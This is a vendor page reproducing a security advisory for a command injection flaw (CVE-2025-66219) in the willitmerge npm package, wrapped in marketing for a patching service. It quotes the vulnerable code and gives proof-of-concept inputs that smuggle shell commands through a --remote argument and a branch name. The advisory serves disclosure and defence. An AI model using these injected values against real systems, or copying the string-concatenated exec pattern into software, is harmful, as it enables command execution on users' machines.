Get a Demo

Let's Patch It!

Book a short call with one our specialists, we'll walk you through how Endor Patches work, and ask you a few questions about your environment (like your primary programming languages and repository management). We'll also send you an email right after you fill out the form, feel free to reply with any questions you have in advance!

CVE

CVE-2025-66219

willitmerge has a Command Injection vulnerability
Back to all
CVE

CVE-2025-66219

willitmerge has a Command Injection vulnerability

willitmerge describes itself as a command line tool to check if pull requests are mergeable. There is a Command Injection vulnerability in version willitmerge@0.2.1.

Resources: 

  • Project's GitHub source code: https://github.com/shama/willitmerge/
  • Project's npm package: https://www.npmjs.com/package/willitmerge

Background on exploitation

Reporting a Command Injection vulnerability in willitmerge npm package.

A security vulnerability manifests in this package due to the use of insecure child process execution API (exec) to which it concateanes user input, whether provided to the command-line flag, or is in user control in the target repository.

Exploit 

POC 1

  1. Install willitmerge
  2. Run it with the following command
willitmerge --verbose --remote "https://github.com/lirantal/npq.git; touch /tmp/hel"
  1. Confirm the file /tmp/hel is created on disk

GitHub-sourced attack vector

Lines 189-197 in lib/willitmerge.js

pass user input controlled by repository collaborators into the git command:

  var cmds = [
    'git checkout -b ' + branch + ' ' + that.options.remote + '/' + iss.base.ref,
    'git remote add ' + branch + ' ' + gitUrl,
    'git pull ' + branch + ' ' + iss.head.ref,
    'git reset --merge HEAD',
    'git checkout ' + origBranch,
    'git branch -D ' + branch,
    'git remote rm ' + branch
  ];

Users creating malicious branch names such as ;{echo,hello,world}>/tmp/c

This is a similar attack vector to that which was reported for the [pullit vulnerability (https://security.snyk.io/vuln/npm:pullit:20180214)

Author

Liran Tal

Package Versions Affected

Package Version
patch Availability
No items found.

Automatically patch vulnerabilities without upgrading

Fix Without Upgrading
Detect compatible fix
Apply safe remediation
Fix with a single pull request

CVSS Version

Severity
Base Score
CVSS Version
Score Vector
C
H
U
6.9
-
4.0
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
C
H
U
0
-
C
H
U
-

Related Resources

No items found.

References

https://github.com/shama/willitmerge/security/advisories/GHSA-j9wj-m24m-7jj6, https://nvd.nist.gov/vuln/detail/CVE-2025-66219, https://github.com/shama/willitmerge, https://github.com/shama/willitmerge/blob/2fe91d05191fb05ac6da685828d109a3a5885028/lib/willitmerge.js#L189-L197

Severity

9.8

CVSS Score
0
10

Basic Information

Ecosystem
Base CVSS
9.8
EPSS Probability
0.00242%
EPSS Percentile
0.47192%
Introduced Version
0
Fix Available

Fix Critical Vulnerabilities Instantly

Secure your app without upgrading.
Fix Without Upgrading